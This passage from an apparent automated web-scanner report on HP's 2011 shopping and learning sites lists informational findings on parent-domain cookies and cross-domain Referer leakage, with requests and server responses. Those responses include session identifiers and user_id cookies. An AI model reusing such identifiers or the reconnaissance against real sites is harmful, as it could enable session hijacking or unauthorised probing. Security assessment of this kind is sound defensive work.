The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /can/computer/categories/tvs/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.44. http://www.shopping.hp.com/webapp/shopping/accessories_landing.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/accessories_landing.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/accessories_landing.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.45. http://www.shopping.hp.com/webapp/shopping/can.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/can.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/can.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.46. http://www.shopping.hp.com/webapp/shopping/catalogRequest.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/catalogRequest.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:32 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/catalogRequest.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.47. http://www.shopping.hp.com/webapp/shopping/cto.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/cto.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/cto.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.48. http://www.shopping.hp.com/webapp/shopping/express_store.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/express_store.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:30 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/express_store.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.49. http://www.shopping.hp.com/webapp/shopping/feedback.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/feedback.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:32 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/feedback.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:32 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkujtmS2Ap6NS7tu1bWeAbTng%3D%3D; expires=Friday, 28-Oct-2011 12:15:32 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:32 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 146897

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

8.50. http://www.shopping.hp.com/webapp/shopping/help.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/help.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:24 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/help.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.51. http://www.shopping.hp.com/webapp/shopping/home.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/home.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/home.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.52. http://www.shopping.hp.com/webapp/shopping/mpss_portal.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/mpss_portal.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/mpss_portal.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.53. http://www.shopping.hp.com/webapp/shopping/offers_guide.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/offers_guide.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:30 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/offers_guide.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:30 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrg9uQ0Ax%2BNSDpslvbdQedn2vi; expires=Friday, 28-Oct-2011 12:15:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 130931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

8.54. http://www.shopping.hp.com/webapp/shopping/print_supp_acc_landing.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/print_supp_acc_landing.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:28 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/print_supp_acc_landing.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.55. http://www.shopping.hp.com/webapp/shopping/questions.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/questions.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/questions.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.56. http://www.shopping.hp.com/webapp/shopping/return_exchange.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/return_exchange.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:33 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/return_exchange.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.57. http://www.shopping.hp.com/webapp/shopping/sale_guide.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/sale_guide.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:24 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/sale_guide.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:24 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkvj92T3Ah5Oinju1rYdwGc0ic%3D; expires=Friday, 28-Oct-2011 12:15:24 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:24 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 142157

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

8.58. http://www.shopping.hp.com/webapp/shopping/search_request.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/search_request.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/
hho_omni_usen=window.hpmetrics.isearch%3D%7B%27search_term%27%3A%27null%27%2C%27search_referrer%27%3A%27%27%2C%27searchtype%27%3A%27search_noresults_keyword%27%2C%27sort%27%3A%27most_popular%27%2C%27numrecords%27%3A0%2C%27numchosen%27%3A0%2C%27resultset%27%3A0%2C%27refinepath%27%3A%27%27%2C%27correct%27%3A0%2C%27suggest%27%3A%27%27%2C%27search_platform%27%3A%27EA%27%2C%27searchresultpage%27%3Atrue%2C%27searchrefine%27%3Afalse%7D; domain=.hp.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/search_request.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.59. http://www.shopping.hp.com/webapp/shopping/series_can.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/series_can.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/series_can.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:25 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlktiNuR3glwOyDju1vadAGc0ic%3D; expires=Friday, 28-Oct-2011 12:15:25 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:25 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 142108

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

8.60. http://www.shopping.hp.com/webapp/shopping/store_access.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/store_access.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:22 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/store_access.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.61. http://www.shopping.hp.com/webapp/shopping/supplies_category.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/supplies_category.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/supplies_category.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.62. http://www.shopping.hp.com/webapp/shopping/terms.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/terms.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/terms.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:34 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkoi9if2QN%2FMyvpvFvfcwCamWvi; expires=Friday, 28-Oct-2011 12:15:34 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:34 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 142285

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

8.63. http://www.shopping.hp.com/webapp/shopping/topRatedLanding.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/topRatedLanding.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:31 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/topRatedLanding.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9. Cross-domain Referer leakage previous next
There are 22 instances of this issue:

http://h30187.www3.hp.com/
http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm
http://h30187.www3.hp.com/howto_QL_courses.jsp
http://h30187.www3.hp.com/index.jsp
https://h30248.www3.hp.com/recycle/supplies/index.asp
https://h30406.www3.hp.com/campaigns/2011/promo/1-9XZBS/index.php
http://h30415.www3.hp.com/ModColumnStories_dsp.jsp
http://h30415.www3.hp.com/components.jsp
http://h30428.www3.hp.com/
http://h41112.www4.hp.com/price_cat_rss/index.php
http://h41112.www4.hp.com/price_cat_rss/index.php
http://h41112.www4.hp.com/price_cat_rss/index.php
http://h41112.www4.hp.com/promo/webos/us/en/index.html
http://h41112.www4.hp.com/promo/webos/us/en/tablets/touchpad.html
http://h71036.www7.hp.com/hho/cache/308070-0-0-225-121.html
http://h71036.www7.hp.com/hho/cache/309975-0-0-225-121.html
http://h71036.www7.hp.com/hho/cache/386481-0-0-225-121.html
http://h71036.www7.hp.com/hho/cache/386512-0-0-225-121.html
http://h71036.www7.hp.com/hho/cache/386526-0-0-225-121.html
http://h71036.www7.hp.com/hho/cache/386529-0-0-225-121.html
http://hp.digitalriver.com/store
https://hp.digitalriver.com/store

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

9.1. http://h30187.www3.hp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30187.www3.hp.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://h30187.www3.hp.com/?tab=atHome&mcid=hho

The response contains the following links to other domains:

http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://hplc-prod.s3.amazonaws.com/media/46048/digital-photography.jpg?v=1281723386000
http://hplc-prod.s3.amazonaws.com/media/46049/home-office.jpg?v=1281723061000
http://hplc-prod.s3.amazonaws.com/media/46050/ms-office-adobe-home.jpg?v=1281723061000
http://hplc-prod.s3.amazonaws.com/media/46051/pc-security-home.jpg?v=1281723387000
http://hplc-prod.s3.amazonaws.com/media/50471/virtualRooms_v2_148.jpg?v=1287408819000
http://hplc-prod.s3.amazonaws.com/media/50480/photo_printer_64.jpg?v=1288625342000
http://hplc-prod.s3.amazonaws.com/media/50483/desktops_64.jpg?v=1288625342000
http://hplc-prod.s3.amazonaws.com/media/50484/notebooks_64.jpg?v=1288625341000
http://hplc-prod.s3.amazonaws.com/media/50487/BN-mouse_key_usb_64.jpg?v=1288625342000
http://hplc-prod.s3.amazonaws.com/media/50488/Total_care_64.jpg?v=1288625342000
http://hplc-prod.s3.amazonaws.com/media/50581/TS_600t_64.jpg?v=1289247165000
http://hplc-prod.s3.amazonaws.com/media/50685/Beg_guide_to_digital_scrapbooking_v5_180x110.jpg?v=1307469870000
http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js
http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css
http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css
http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js
http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif
http://welcome.hp-ww.com/js/hpweb_soctag.js

Request

GET /?tab=atHome&mcid=hho HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.2. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30187.www3.hp.com
Path:	/campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The page was loaded from a URL containing a query string:

http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm?webPageId=1000000

The response contains the following links to other domains:

http://hplc-prod.s3.amazonaws.com/media/33169/jump-start_your_creativity_64x64.jpg?v=1281719082000
http://hplc-prod.s3.amazonaws.com/media/40527/Intermediate_website_design_64x64.jpg?v=1281721718000
http://hplc-prod.s3.amazonaws.com/media/43988/Adobe_Photoshop_CS4_introduction_64x64.jpg?v=1281722923000
http://hplc-prod.s3.amazonaws.com/media/45790/san_64.jpg?v=1288625644000
http://hplc-prod.s3.amazonaws.com/media/45874/hho-monitors_64.jpg?v=1288625643000
http://hplc-prod.s3.amazonaws.com/media/46149/Building_your_first_web_page_64x64.jpg?v=1281723189000
http://hplc-prod.s3.amazonaws.com/media/46287/ent-elitebook_64.jpg?v=1288625644000
http://hplc-prod.s3.amazonaws.com/media/48894/Photoshop_101_image_size_and_resolution_basics_64x64.jpg?v=1281728528000
http://hplc-prod.s3.amazonaws.com/media/49070/Print_marketing_materials_in-house_on_a_wide-format_printer_64x64.jpg?v=1281731127000
http://hplc-prod.s3.amazonaws.com/media/49584/Adobe_Photoshop_CS4_layer_basics_64x64.jpg?v=1281733557000
http://hplc-prod.s3.amazonaws.com/media/49717/Explore_color_modes_Photoshop_CS4_64x64.jpg?v=1281735207000
http://hplc-prod.s3.amazonaws.com/media/49719/Change_hue_saturation_Photoshop_CS4_64x64.jpg?v=1281735208000
http://hplc-prod.s3.amazonaws.com/media/50281/pixi_smartphone_64.jpg?v=1288625644000
http://hplc-prod.s3.amazonaws.com/media/50464/POS_64.jpg?v=1288625643000
http://hplc-prod.s3.amazonaws.com/media/50465/print_multi_64.jpg?v=1288625643000
http://hplc-prod.s3.amazonaws.com/media/50471/virtualRooms_v2_148.jpg?v=1287408819000
http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js
http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css
http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css
http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js
http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif
http://welcome.hp-ww.com/js/hpweb_soctag.js

Request

GET /campus/p/campusId/10640/Graphic_arts.htm?webPageId=1000000 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Jun 2011 11:50:05 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:11 GMT
Set-Cookie: hplcpsession.id=a298d08ec5e5c2178710c2738c2c; path=/
Set-Cookie: JSESSIONID=abcl0BxsS3bt7he2MyGdt; path=/
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392C1E4830C54ECB49A6E4104218808A781F7C4F8A19AB96069A029839FFE95A122B91AE95A1A2770D491AC17E946292851;PATH=/
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
X-Nginx-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 57843
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">

<head>
<title>
HP
Learning center
...[SNIP]...
</script>

<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css"
type="text/css" rel="stylesheet">
<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css"
type="text/css" rel="stylesheet">
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/js/hpweb_soctag.js"></script>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html" onmousedown="return Powered.WebAnalytics.recordClick(this, '');" title="HP.com home"><img
src="http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif"
width="64" height="55" alt=""
border="0"><span class="screenReading">
...[SNIP]...
EID=19701&SBLID=&jumpid=in_r2910_VRbundles/psgpromo/subs/heasmith" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104916');" target="_blank">
<img src="http://hplc-prod.s3.amazonaws.com/media/50471/virtualRooms_v2_148.jpg?v=1287408819000" border="0" alt="HP Virtual Rooms" />
</a>
...[SNIP]...
<a href="/courses/overview/p/courseId/34389/Adobe_Photoshop_CS4_introduction.htm?courseSessionId=306003&campusId=10640&hplcpsession.id=a298d08ec5e5c2178710c2738c2c"><img src="http://hplc-prod.s3.amazonaws.com/media/43988/Adobe_Photoshop_CS4_introduction_64x64.jpg?v=1281722923000" alt="Adobe Photoshop CS4: introduction" border="0"/></a>
...[SNIP]...
<a href="/articles/viewArticle/p/courseId/39570/Adobe_Photoshop_CS4_layer_basics_quick_lesson_.htm?courseSessionId=306047&campusId=10640&hplcpsession.id=a298d08ec5e5c2178710c2738c2c"><img src="http://hplc-prod.s3.amazonaws.com/media/49584/Adobe_Photoshop_CS4_layer_basics_64x64.jpg?v=1281733557000" alt="Adobe Photoshop CS4: layer basics (quick lesson)" border="0"/></a>
...[SNIP]...
<a href="/courses/overview/p/courseId/7/Building_your_first_web_page.htm?courseSessionId=319918&campusId=10640&hplcpsession.id=a298d08ec5e5c2178710c2738c2c"><img src="http://hplc-prod.s3.amazonaws.com/media/46149/Building_your_first_web_page_64x64.jpg?v=1281723189000" alt="Building your first web page" border="0"/></a>
...[SNIP]...
<a href="/articles/viewArticle/p/courseId/39808/Changing_hue_and_sat.htm?courseSessionId=320072&campusId=10640&hplcpsession.id=a298d08ec5e5c2178710c2738c2c"><img src="http://hplc-prod.s3.amazonaws.com/media/49719/Change_hue_saturation_Photoshop_CS4_64x64.jpg?v=1281735208000" alt="Changing hue and saturation in Adobe.. Photoshop.. CS4 (quick lesson)" border="0"/></a>
...[SNIP]...
